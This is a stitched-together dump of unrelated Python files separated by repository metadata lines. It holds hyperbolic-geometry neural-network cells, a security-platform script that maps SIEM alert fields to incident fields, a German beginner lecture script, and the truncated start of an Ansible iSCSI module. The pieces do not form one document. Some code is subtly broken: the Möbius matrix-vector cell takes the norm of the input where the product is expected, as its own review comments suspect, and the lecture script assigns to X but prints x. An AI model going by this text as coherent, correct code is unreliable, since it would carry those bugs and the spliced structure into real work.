        x_klein = 2 * x / (1.0 + x_2)
        x_klein = self.klein_constraint(x_klein)
        return x_klein


class KleinConstraint(Cell):
    """Rescale Klein-model points whose norm exceeds the model boundary."""

    def __init__(self, min_norm):
        """Build norm/shape/reshape ops and the maximum norm."""
        super(KleinConstraint, self).__init__()
        self.norm = Norm(axis=-1)
        self.min_norm = min_norm
        self.maxnorm = 1 - 4e-3
        self.shape = Shape()
        self.reshape = Reshape()

    def construct(self, x):
        """Flatten to 2-D, rescale offending rows, restore the input shape."""
        last_dim_val = self.shape(x)[-1]
        norm = self.reshape(self.norm(x), (-1, 1))
        maxnorm = self.maxnorm
        cond = norm > maxnorm
        x_reshape = self.reshape(x, (-1, last_dim_val))
        projected = x_reshape / (norm + self.min_norm) * maxnorm
        x_reshape = mnp.where(cond, projected, x_reshape)
        x = self.reshape(x_reshape, self.shape(x))
        return x


class EinsteinMidpoint(Cell):
    """Lorentz-factor-weighted (Einstein) midpoint of a set of ball points."""

    def __init__(self, min_norm):
        """Compose the Klein conversion, Lorentz factors and reductions."""
        super(EinsteinMidpoint, self).__init__()
        self.to_klein = ToKlein(min_norm)
        self.lorentz_factors = LorentzFactors(min_norm)
        self.sum = ReduceSum(keep_dims=True)
        self.unsqueeze = ExpandDims()
        self.sumFalse = ReduceSum(keep_dims=False)
        self.klein_constraint = KleinConstraint(min_norm)
        self.klein_to_poincare = KleinToPoincare(min_norm)

    def construct(self, x, c):
        """Average in the Klein model with Lorentz weights, return in the ball.

        Zero-norm vectors are treated as padding and excluded from the
        weighted sum by zeroing their Lorentz factor.
        """
        x = self.to_klein(x, c)
        x_lorentz = self.lorentz_factors(x)
        x_norm = mnp.norm(x, axis=-1)
        # deal with pad value
        x_lorentz = (1.0 - (x_norm == 0.0).astype(mstype.float32)) * x_lorentz
        x_lorentz_sum = self.sum(x_lorentz, -1)
        x_lorentz_expand = self.unsqueeze(x_lorentz, -1)
        x_midpoint = self.sumFalse(x_lorentz_expand * x, 1) / x_lorentz_sum
        x_midpoint = self.klein_constraint(x_midpoint)
        x_p = self.klein_to_poincare(x_midpoint, c)
        return x_p


class ClampTanh(Cell):
    """tanh with its argument clamped to [-c, c] to avoid saturation issues."""

    def __init__(self):
        """Build the clamp and tanh ops."""
        super(ClampTanh, self).__init__()
        self.clamp = Clamp()
        self.tanh = Tanh()

    def construct(self, x, c=15):
        """Return tanh(clip(x, -c, c))."""
        return self.tanh(self.clamp(x, -c, c))


class MobiusMatvec(Cell):
    """Mobius matrix-vector multiplication on the Poincare ball."""

    def __init__(self, min_norm):
        """Build norm/artanh/transpose/clamp helpers."""
        super(MobiusMatvec, self).__init__()
        self.min_norm = min_norm
        self.norm_k = Norm(axis=-1, keep_dims=True)
        self.artanh = Artanh()
        # NOTE(review): duplicate assignment of self.norm_k kept as-is.
        self.norm_k = Norm(axis=-1, keep_dims=True)
        self.clamp_min = ClampMin()
        self.transpose = Transpose()
        self.clamp_tanh = ClampTanh()

    def construct(self, m, x, c):
        """Return m (x) x: tanh(||mx||/||x|| * artanh(sqrt(c)||x||)) * mx / (sqrt(c)||mx||)."""
        sqrt_c = c ** 0.5
        x_norm = self.clamp_min(self.norm_k(x), self.min_norm)
        mx = matmul(x, self.transpose(m, (1, 0)))
        # NOTE(review): this norms x again, not mx — reference Mobius-matvec
        # implementations use norm(mx) here; confirm whether this is a bug.
        mx_norm = self.clamp_min(self.norm_k(x), self.min_norm)
        t1 = self.artanh(sqrt_c * x_norm)
        t2 = self.clamp_tanh(mx_norm / x_norm * t1)
        res_c = t2 * mx / (mx_norm * sqrt_c)
        # cond is all-zero, so mnp.where always selects res_c; presumably a
        # placeholder for a "mx == 0 -> 0" guard — TODO confirm.
        cond = mnp.array([[0]] * len(mx))
        res_0 = mnp.zeros(1)
        res = mnp.where(cond, res_0, res_c)
        return res


class Expmap0(Cell):
    """Exponential map at the origin of the Poincare ball."""

    def __init__(self, min_norm):
        """Build clamp/tanh/norm helpers."""
        super(Expmap0, self).__init__()
        self.clamp_min = ClampMin()
        self.min_norm = min_norm
        self.clamp_tanh = ClampTanh()
        self.norm_k = Norm(axis=-1, keep_dims=True)

    def construct(self, u, c):
        """Map tangent vector u at 0 into the ball of curvature c."""
        sqrt_c = c ** 0.5
        u_norm = self.clamp_min(self.norm_k(u), self.min_norm)
        gamma_1 = self.clamp_tanh(sqrt_c * u_norm) * u / (sqrt_c * u_norm)
        return gamma_1


class MobiusAdd(Cell):
    """Mobius addition x (+) y on the Poincare ball of curvature c."""

    def __init__(self, min_norm):
        """Build pow/sum/clamp helpers."""
        super(MobiusAdd, self).__init__()
        self.pow = Pow()
        self.sum = ReduceSum(keep_dims=True)
        self.clamp_min = ClampMin()
        self.min_norm = min_norm

    def construct(self, x, y, c, dim=-1):
        """Standard gyro-addition formula with an epsilon-clamped denominator."""
        x2 = self.sum(self.pow(x, 2), dim)
        y2 = self.sum(self.pow(y, 2), dim)
        xy = self.sum(x * y, dim)
        num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y
        denom = 1 + 2 * c * xy + c ** 2 * x2 * y2
        return num / self.clamp_min(denom, self.min_norm)
30.920863
114
0.591671
be9a0ae08e5d2b0cf33ab9e197160664f5587480
31,571
py
Python
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
from CommonServerPython import * import itertools import numbers import re import socket from collections import Counter from collections import OrderedDict from datetime import datetime, timedelta INCIDENT_FIELD_NAME = "name" INCIDENT_FIELD_MACHINE_NAME = "cliName" INCIDENT_FIELD_SYSTEM = "system" SAMPLES_INCOMING = 'incomingSamples' SAMPLES_SCHEME = 'scheme' SAMPLES_OUTGOING = 'outgoingSamples' COUNT_KEYWORD = "count" SIEM_FIELDS = {'Account ID': {'aliases': ['accountid', 'account id'], 'validators': []}, 'Account Name': {'aliases': ['accountname', 'account name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Account Type': {'aliases': ['accounttype', 'account type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Agent ID': {'aliases': ['agentid', 'agent id', 'sensor id', 'tenant id'], 'validators': []}, 'Tenant Name': {'aliases': ['tenant name', 'tenant name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'App': {'aliases': ['app', 'app'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Attachment Name': {'aliases': ['attachmentname', 'attachment name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Blocked Action': {'aliases': ['blockedaction', 'blocked action', 'prevention mode'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'City': {'aliases': ['city'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Command Line': {'aliases': ['commandline', 'command line', 'cmdline', 'cmd line', 'process file name', 'process file path', 'process full path', 'process full path', 'cmd'], 'validators': ['validate_file_full_path']}, 'Event ID': {'aliases': ['eventid', 'event id', 'alert id', 'offense id'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Event Type': {'aliases': ['eventtype', 'event type', 'alert type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Company Name': {'aliases': ['companyname', 'company name', 'company', 'customer'], 
'validators': ['validate_alphanumeric_with_common_punct']}, 'Country': {'aliases': ['country', 'country name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Critical Assets': {'aliases': ['criticalassets', 'critical assets'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Description': {'aliases': ['description'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination IP': {'aliases': ['destinationip', 'destination ip', 'destination address', 'dest ip', 'dest address', 'target address', 'dst'], 'validators': ['validate_ip']}, 'Destination Port': {'aliases': ['destinationport', 'destination port', 'dst port', 'dest port'], 'validators': ['validate_number']}, 'Email BCC': {'aliases': ['emailbcc', 'email bcc', 'bcc recipient', 'bcc'], 'validators': ['validate_email']}, 'Email Body': {'aliases': ['emailbody', 'email body', 'body'], 'validators': []}, 'Email Body Format': {'aliases': ['emailbodyformat', 'email body format', 'body type', 'body content type'], 'validators': []}, 'Email Body HTML': {'aliases': ['emailbodyhtml', 'email body html'], 'validators': []}, 'Email CC': {'aliases': ['emailcc', 'email cc', 'cc recipient', 'cc'], 'validators': ['validate_email']}, 'Email From': {'aliases': ['emailfrom', 'email from', 'from'], 'validators': ['validate_email']}, 'Email HTML': {'aliases': ['emailhtml', 'email html'], 'validators': []}, 'Email Headers': {'aliases': ['emailheaders', 'email headers', 'headers', 'message headers', 'internet message header'], 'validators': ['']}, 'Email In Reply To': {'aliases': ['emailinreplyto', 'email in reply to'], 'validators': []}, 'Email Received': {'aliases': ['emailreceived', 'email received', 'received date time', 'received time'], 'validators': ['validate_date']}, 'Email Reply To': {'aliases': ['emailreplyto', 'email replay to', 'reply to'], 'validators': []}, 'Email Sender IP': {'aliases': ['emailsenderip', 'email sender ip'], 'validators': ['validate_ip']}, 'Email Size': 
{'aliases': ['emailsize', 'email size'], 'validators': ['validate_number']}, 'Email Subject': {'aliases': ['emailsubject', 'email subject', 'subject'], 'validators': []}, 'Email To': {'aliases': ['emailto', 'email to', 'to recipients', 'recipients', 'recipient'], 'validators': ['validate_email']}, 'File Hash': {'aliases': ['filehash', 'file hash', 'event file hash', 'md5', 'sha1', 'sha256'], 'validators': ['validate_hash']}, 'File Name': {'aliases': ['filename', 'file name'], 'validators': []}, 'File Path': {'aliases': ['filepath', 'file path', 'full path', 'full path'], 'validators': ['validate_file_full_path']}, 'File Size': {'aliases': ['filesize', 'file size'], 'validators': ['validate_number']}, 'File Type': {'aliases': ['filetype', 'file type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Source Hostname': { 'aliases': ['source hostname', 'source host name', 'src hostname', 'src host name'], 'validators': ['validate_hostname']}, 'Destination Hostname': { 'aliases': ['destination hostname', 'destination host name', 'dest hostname', 'dest host name', 'dst hostname', 'dst host name', 'target hostname', 'target host name'], 'validators': ['validate_hostname']}, 'Source Network': {'aliases': ['source network', 'sourcenetwork', 'src network'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination Network': {'aliases': ['destination network', 'destinationnetwork', 'dest network', 'dst network', 'target netwrok'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Device Name': { 'aliases': ['devicename', 'device name', 'endpoint name', 'end point name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'MAC Address': {'aliases': ['macaddress', 'mac address', 'mac', 'src mac', 'source mac'], 'validators': ['validate_mac']}, 'PID': {'aliases': ['pid', 'process pid', 'parent process pid', 'target process pid'], 'validators': ['validate_number']}, 'Parent Process ID': {'aliases': ['parentprocessid', 'parent 
process id'], 'validators': ['validate_number']}, 'Region': {'aliases': ['region', 'region'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Signature': {'aliases': ['signature', 'signature'], 'validators': []}, 'Source IP': { 'aliases': ['sourceip', 'source ip', 'src ip', 'src address', 'source address', 'computer ip', 'device ip', 'attacker address', 'attacker ip', 'sender ip', 'sender address', 'agent ip'], 'validators': ['validate_ip']}, 'Source Port': {'aliases': ['sourceport', 'source port', 'src port'], 'validators': ['validate_number']}, 'OS': {'aliases': ['operating system', 'os type', 'os version', 'os'], 'validators': []}, 'Subtype': {'aliases': ['subtype', 'subtype'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Terminated Action': {'aliases': ['terminatedaction', 'terminated action'], 'validators': []}, 'Traps ID': {'aliases': ['trapsid', 'traps id', 'trap id'], 'validators': []}, 'Source Username': {'aliases': ['username', 'username', 'user name', 'src user name', 'src username', 'source username', 'source user name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination Username': {'aliases': ['destination username', 'destination user name', 'dest username', 'dest user name', 'dst username', 'dst user name', 'target user name', 'target username'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Detection URL': {'aliases': ['detection url'], 'validators': ['validate_url']}, 'Vendor ID': {'aliases': ['vendorid', 'vendor id'], 'validators': []}, 'Vendor Product': {'aliases': ['vendorproduct', 'vendor product'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'category': {'aliases': ['category', 'category'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'details': {'aliases': ['details', 'description'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'name': {'aliases': ['name', 'Name', 'alert name', 'event name', 'rule name', 'title'], 'validators': 
['validate_alphanumeric_with_common_punct', 'extact_name_math']}, 'occurred': {'aliases': ['occurred', 'occured', 'occurred time', 'event start time', 'event at', 'event time', 'start time', 'create time', 'timestamp', 'unix time', 'click time'], 'validators': ['validate_date']}, 'owner': {'aliases': ['owner'], 'validators': []}, 'severity': {'aliases': ['event severity', 'severity', 'event priority', 'priority', 'urgency'], 'validators': []}, 'Log Source': {'aliases': ['log source', 'log sources', 'logsource'], 'validators': []}, 'Protocol': {'aliases': ['protocol'], 'validators': []}, } suffix_mapping = { 'ing': '', 'ly': '', 'ed': '', 'ious': '', 'ies': 'y', 'ive': '', 'es': '', 's': '' } class DateValidator: def __init__(self): year_options = ['%y', '%Y'] months_options = ['%m', '%B'] day_options = ['%d'] delimeters_options = [".", "-", "/", "\\"] self.common_separators = [' ', 'T', ','] date_formats_options = [] # type: List[tuple] for delimeter in delimeters_options: delimeters = [delimeter] date_formats_options += list( itertools.product(year_options, delimeters, months_options, delimeters, day_options)) date_formats_options += list( itertools.product(year_options, delimeters, day_options, delimeters, months_options)) date_formats_options += list( itertools.product(day_options, delimeters, months_options, delimeters, year_options)) date_formats_options += list( itertools.product(day_options, delimeters, months_options, delimeters, year_options)) self.date_formats_options = map(lambda x: "".join(x), date_formats_options) def try_parsing_date(self, text): for fmt in self.date_formats_options: try: return datetime.strptime(text, fmt) except ValueError: pass return None def has_valid_date(self, text): parts = [] # type: List[str] for sep in self.common_separators: parts += text.split(sep) return any(map(lambda x: self.try_parsing_date(x) is not None, parts)) @staticmethod def is_datetime_last_years(d, number_of_years=3): if d is not None: now = datetime.now() 
return now - timedelta(days=365 * number_of_years) <= d <= now + timedelta(days=365 * number_of_years) return False @staticmethod def safe_parse_timestamp(value): try: d = datetime.fromtimestamp(int(value)) return d except Exception: return None def is_unix_timestamp(self, value): try: value = int(value) return self.is_datetime_last_years(self.safe_parse_timestamp(value)) or self.is_datetime_last_years( self.safe_parse_timestamp(value / 1000)) except Exception: return False class Validator: def __init__(self): self.EMAIL_REGEX = re.compile('^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$') self.NUMBER_REGEX = re.compile('^([0-9]+)$') self.SHA256_REGEX = re.compile('^[A-Fa-f0-9]{64}$') self.MD5_REGEX = re.compile('^[a-fA-F0-9]{32}$') self.HASH_REGEX = re.compile('^[a-fA-F0-9]+$') self.MAC_REGEX = re.compile('^[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$', re.IGNORECASE) self.URL_REGEX = re.compile( r'^(?:http|ftp|hxxp)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip r'(?::\d+)?' 
# optional port r'(?:/?|[/?]\S+)$', re.IGNORECASE) self.COMMON_NAME_CHARECTERS = re.compile('^[0-9a-zA-Z"\s_\-\'./]+$') self.HOSTNAME_PART_REGEX = re.compile('(?!-)[A-Z\d-]{1,63}(?<!-)$') self.FULL_FILE_PATH_REGEX = re.compile('^((?:/[^/\n]+)*|.*(\\\\.*))$') self.date_validator = DateValidator() def validate_regex(self, pattern, value, json_field_name=None): if isinstance(value, basestring): return pattern.match(value) is not None return False def validate_ip(self, field_name, value, json_field_name=None): try: socket.inet_aton(value) return True except socket.error: return False def validate_url(self, field_name, value, json_field_name=None): return self.validate_regex(self.URL_REGEX, value) def validate_email(self, field_name, value, json_field_name=None): return self.validate_regex(self.EMAIL_REGEX, value) def validate_number(self, field_name, value, json_field_name=None): if isinstance(value, numbers.Number): return True else: return self.validate_regex(self.NUMBER_REGEX, value, json_field_name=None) def validate_not_count(self, field_name, value): is_count = COUNT_KEYWORD in field_name.lower() and self.validate_number(field_name, value) return not is_count def validate_sha256(self, field_name, value, json_field_name=None): return self.validate_regex(self.SHA256_REGEX, value) def validate_md5(self, field_name, value, json_field_name=None): return self.validate_regex(self.MD5_REGEX, value) def validate_hash(self, field_name, value, json_field_name=None): return self.validate_regex(self.HASH_REGEX, value) and len(value) % 2 == 0 def validate_mac(self, field_name, value, json_field_name=None): return self.validate_regex(self.MAC_REGEX, value) def validate_hostname(self, field_name, hostname, json_field_name=None): if not isinstance(hostname, basestring) or len(hostname) > 255: # type: ignore return False if hostname[-1] == ".": # type: ignore hostname = hostname[:-1] # type: ignore allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE) return 
all(allowed.match(x) for x in hostname.split(".")) def validate_date(self, field_name, value, json_field_name=None): if self.validate_number("", value): return self.date_validator.is_unix_timestamp(value) else: return self.date_validator.has_valid_date(value) def validate_alphanumeric_with_common_punct(self, field_name, value, json_field_name=None): return self.validate_regex(self.COMMON_NAME_CHARECTERS, value) def validate_file_full_path(self, field_name, value, json_field_name=None): return self.validate_regex(self.FULL_FILE_PATH_REGEX, value) def extact_name_math(self, field_name, value, json_field_name=None): return field_name == json_field_name def validate(self, validator_name, field_name, value, json_field_name=None): validate_func = getattr(self, validator_name) return validate_func(field_name, value, json_field_name) def is_sublist_of_list(s, lst): sub_set = False if s == []: sub_set = True elif s == lst: sub_set = True elif len(s) > len(lst): sub_set = False else: for i in range(len(lst)): if lst[i] == s[0]: n = 1 while (n < len(s)) and (i + n) < len(lst) and (lst[i + n] == s[n]): n += 1 if n == len(s): sub_set = True return sub_set def lemma_word(word): for suffix in suffix_mapping: if word.endswith(suffix): candidate = word[:-len(suffix)] + suffix_mapping[suffix] if candidate in ALL_POSSIBLE_TERMS_SET or candidate.lower() in ALL_POSSIBLE_TERMS_SET: return candidate.lower() return word.lower() def remove_dups(seq): return list(OrderedDict.fromkeys(seq)) def split_by_non_alpha_numeric(_string): return filter(lambda x: x, re.split('[^a-zA-Z0-9]', _string)) def camel_case_split(identifier): matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier) return [m.group(0) for m in matches] def flatten_json(y): out = {} has_more_than_one_value = [] delimeter = '.' 
def flatten(x, name=''): if type(x) is dict: for a in x: flatten(x[a], name + a + delimeter) elif type(x) is list and len(x) > 0 and type(x) is not dict: i = 0 for a in x: flatten(a, name + "[" + str(i) + "]" + delimeter) i += 1 if i > 1: has_more_than_one_value.append(name[:-1]) else: out[name[:-1]] = x flatten(y) return out, has_more_than_one_value def number_of_terms(value): return len(value.split(" ")) def normilize(value): parts = [] # type: List[str] for part in split_by_non_alpha_numeric(value): parts += camel_case_split(part) terms = map(lemma_word, parts) return remove_dups(terms) def validate_value_with_validator(alias, value, json_field_name=None): field_name = ALIASING_MAP[alias] validators = SIEM_FIELDS[field_name]['validators'] # type: ignore validators = [v for v in validators if v] if len(validators) == 0: return True validator_results = [] for validator_name in validators: validator_results.append(VALIDATOR.validate(validator_name, alias, value, json_field_name)) return all(validator_results) def get_candidates(json_field_name): json_field_terms = normilize(json_field_name) aliases_terms = ALIASING_TERMS_MAP.items() match_terms = map(lambda x: x[0], filter(lambda alias_terms: is_sublist_of_list(alias_terms[1], json_field_terms), aliases_terms)) return sorted(match_terms, reverse=True, key=number_of_terms) def suggest_field_with_alias(json_field_name, json_field_value=None): norm_json_field_name = " ".join(normilize(json_field_name)) candidates = get_candidates(json_field_name) if json_field_value is not None: candidates = filter(lambda c: validate_value_with_validator(c, json_field_value, norm_json_field_name), candidates) if len(candidates) > 0: alias = candidates[0] return ALIASING_MAP[alias], alias return None, None def suggest_field(json_field_name, json_field_value=None): return suggest_field_with_alias(json_field_name, json_field_value)[0] def generate_aliases(field): aliases = [] aliases.append(field.lower()) aliases.append(" 
".join(normilize(field))) aliases.append("".join(normilize(field))) return aliases def get_aliasing(siem_fields): aliasing_map = {} aliases_terms_map = {} for field, data in siem_fields.items(): for alias in data['aliases']: aliasing_map[alias] = field aliases_terms_map[alias] = alias.split(" ") return aliasing_map, aliases_terms_map def is_value_substring_of_one_values(value, all_values): return any(map(lambda field: value in field, all_values)) def get_alias_index(field_name, alias): return SIEM_FIELDS[field_name]['aliases'].index(alias) # type: ignore def get_most_relevant_json_field(field_name, json_field_to_alias): if len(json_field_to_alias) == 0: return # calculate jaccard score for each alias, and get the candidates with max score scores = {} for json_field, alias in json_field_to_alias.items(): scores[json_field] = jaccard_similarity_for_string_terms(json_field, alias) scores = {k: v for k, v in scores.items() if v == max(scores.values())} # calculate jaccard score for each field, and get the candidates with max score for json_field, alias in json_field_to_alias.items(): scores[json_field] = jaccard_similarity_for_string_terms(json_field, field_name) scores = {k: v for k, v in scores.items() if v == max(scores.values())} # for candidates with the same score with the least alias index candidates = sorted(list(scores.keys()), key=lambda json_field: get_alias_index(field_name, json_field_to_alias[json_field])) return candidates[0] def match_for_incident(incident_to_match): flat_incident, more_than_one_field_items = flatten_json(incident_to_match) incident = {k: v for k, v in flat_incident.items() if not is_value_substring_of_one_values(k, more_than_one_field_items)} if SCHEME_ONLY: incident = {k: v for k, v in incident.items() if not k.endswith(COUNT_KEYWORD)} else: incident = {k: v for k, v in incident.items() if v is not None and VALIDATOR.validate_not_count(k, v)} mapping = {} # type: ignore for json_field_name, json_field_value in incident.items(): # we 
try to get suggestion if it's scheme or if the value is not empty if SCHEME_ONLY or json_field_value: incident_field_suggestion, alias = suggest_field_with_alias(json_field_name, json_field_value) if incident_field_suggestion: if incident_field_suggestion not in mapping: mapping[incident_field_suggestion] = {} mapping[incident_field_suggestion][json_field_name] = alias return {incident_field_name: get_most_relevant_json_field(incident_field_name, json_field_to_alias) for incident_field_name, json_field_to_alias in mapping.items()} def jaccard_similarity(list1, list2): intersection = len(list(set(list1).intersection(list2))) union = (len(list1) + len(list2)) - intersection return float(intersection) / union def jaccard_similarity_for_string_terms(str1, str2): return jaccard_similarity(normilize(str1), normilize(str2)) def get_most_relevant_match_for_field(field_name, cnt): # return exact match if field_name in cnt: return field_name suggestions_with_jaccard_score = [(suggestion, jaccard_similarity_for_string_terms(field_name, suggestion)) for suggestion in cnt.keys()] suggestions_with_jaccard_score = sorted(suggestions_with_jaccard_score, key=lambda x: x[1], reverse=True) # check for extact terms if suggestions_with_jaccard_score[0][1] == 1: return suggestions_with_jaccard_score[0][0] # if we have only scheme or all the values are the same if SCHEME_ONLY or len(set(cnt.values())) == 1: return suggestions_with_jaccard_score[0][0] return cnt.most_common()[0][0] def match_for_incidents(incidents_to_match): fields_cnt = {} # type: Dict[str, Counter] for flat_incident in incidents_to_match: for k, v in match_for_incident(flat_incident).items(): if k not in fields_cnt: fields_cnt[k] = Counter() if v: fields_cnt[k][v] += 1 mapping_result = {field_name: get_most_relevant_match_for_field(field_name, field_cnt) for field_name, field_cnt in fields_cnt.items()} return mapping_result def format_value_to_mapper(json_field): parts = json_field.split('.', 1) root = parts[0] 
accessor = "" if len(parts) > 1: accessor = parts[1] res = { "simple": "", "complex": { "root": root, "accessor": accessor, "filters": [], "transformers": [] } } return res def format_incident_field_to_mapper(incident_field_name, field_name_to_machine_name): res = { "simple": "", "complex": { "root": field_name_to_machine_name[incident_field_name], "accessor": "", "filters": [], "transformers": [] } } return res def verify_non_empty_values_in_incidents(expression, incidents): for incident in incidents: res = demisto.dt(incident, expression) if res: return True return False def get_complex_value_key(complex_value): if 'complex' in complex_value: complex_value = complex_value['complex'] readable_value = complex_value.get('root') if complex_value.get('accessor'): readable_value += "." + complex_value.get('accessor') return readable_value def combine_mappers(original_mapper, new_mapper, incidents): mapper = new_mapper if original_mapper: mapper.update(original_mapper) return mapper def filter_by_dict_by_keys(_dict, keys): return {k: v for k, v in _dict.items() if k in keys} def parse_incident_sample(sample): if type(sample) is dict and 'rawJSON' in sample: incident = json.loads(sample['rawJSON']) else: try: incident = json.loads(sample) except Exception: incident = sample return incident SCHEME_ONLY = False VALIDATOR = Validator() ALIASING_MAP, ALIASING_TERMS_MAP, FIELD_NAME_TO_CLI_NAME = {}, {}, {} ALL_POSSIBLE_TERMS_SET = set() def init(): global SCHEME_ONLY, VALIDATOR, \ ALIASING_MAP, ALIASING_TERMS_MAP, \ ALL_POSSIBLE_TERMS_SET, SIEM_FIELDS, FIELD_NAME_TO_CLI_NAME SCHEME_ONLY = demisto.args().get('incidentSamplesType') in [SAMPLES_OUTGOING, SAMPLES_SCHEME] fields = demisto.args().get('incidentFields', {}) if fields and len(fields) > 0: fields_names = map(lambda x: x['name'], fields) SIEM_FIELDS = filter_by_dict_by_keys(SIEM_FIELDS, fields_names) for custom_field in filter(lambda x: not x['system'], fields): field_name = custom_field[INCIDENT_FIELD_NAME] 
SIEM_FIELDS[field_name] = {'aliases': generate_aliases(field_name), 'validators': []} FIELD_NAME_TO_CLI_NAME = {field[INCIDENT_FIELD_NAME]: field[INCIDENT_FIELD_MACHINE_NAME] for field in fields} ALIASING_MAP, ALIASING_TERMS_MAP = get_aliasing(SIEM_FIELDS) terms = [] # type: List[str] for field in SIEM_FIELDS.values(): for alias in field['aliases']: # type: ignore terms += alias.split(" ") ALL_POSSIBLE_TERMS_SET = set(terms) def main(): init() incidents_samples = demisto.args().get('incidentSamples') if incidents_samples: if isinstance(incidents_samples, basestring): incidents_samples = json.loads(incidents_samples) # type: ignore incidents = map(parse_incident_sample, incidents_samples) else: return_error("Could not parse incident samples") original_mapper = demisto.args().get('currentMapper') if type(original_mapper) is not dict or len(original_mapper) == 0: original_mapper = None matches = match_for_incidents(incidents) if demisto.args().get('incidentSamplesType') == SAMPLES_OUTGOING: mapper = {v: format_incident_field_to_mapper(k, FIELD_NAME_TO_CLI_NAME) for k, v in matches.items() if k in FIELD_NAME_TO_CLI_NAME} else: mapper = {k: format_value_to_mapper(v) for k, v in matches.items()} mapper = combine_mappers(original_mapper, mapper, incidents) return mapper if __name__ in ['__main__', '__builtin__', 'builtins']: demisto.results(main())
41.982713
119
0.565424
beb9462e7eb4cb9120161d5efcebb2195448e61e
388
py
Python
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
# 1. Vorlesung mit Python (3. zu Skriptsprachen insges. -- 26.09.2020 - 1. PDF dazu) x = input ("Ihr Name? ") X = "Hallo " + x print (x) x = input ("Ihr Alter? ") x = int(x) - 5 print (x) # Seite 12 liste = "Hello World" print (liste) print (liste[2]) # Seite 17 strvar = "ABC" print (strvar) strvar = "ABC" * 5 print (strvar) #strvar = "ABC" + 5 #datentypfehler print (strvar)
13.857143
84
0.608247
22a835b39d5c26d87758f88e10e54d6007c99983
11,393
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2013, Serge van Ginderachter <[email protected]> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: open_iscsi author: - Serge van Ginderachter (@srvg) short_description: Manage iSCSI targets with Open-iSCSI description: - Discover targets on given portal, (dis)connect targets, mark targets to manually or auto start, return device nodes of connected targets. requirements: - open_iscsi library and tools (iscsiadm) options: portal: description: - The IP address of the iSCSI target. type: str aliases: [ ip ] port: description: - The port on which the iSCSI target process listens. type: str default: 3260 target: description: - The iSCSI target name. type: str aliases: [ name, targetname ] login: description: - Whether the target node should be connected. type: bool aliases: [ state ] node_auth: description: - The value for C(discovery.sendtargets.auth.authmethod). type: str default: CHAP node_user: description: - The value for C(discovery.sendtargets.auth.username). type: str node_pass: description: - The value for C(discovery.sendtargets.auth.password). type: str auto_node_startup: description: - Whether the target node should be automatically connected at startup. type: bool 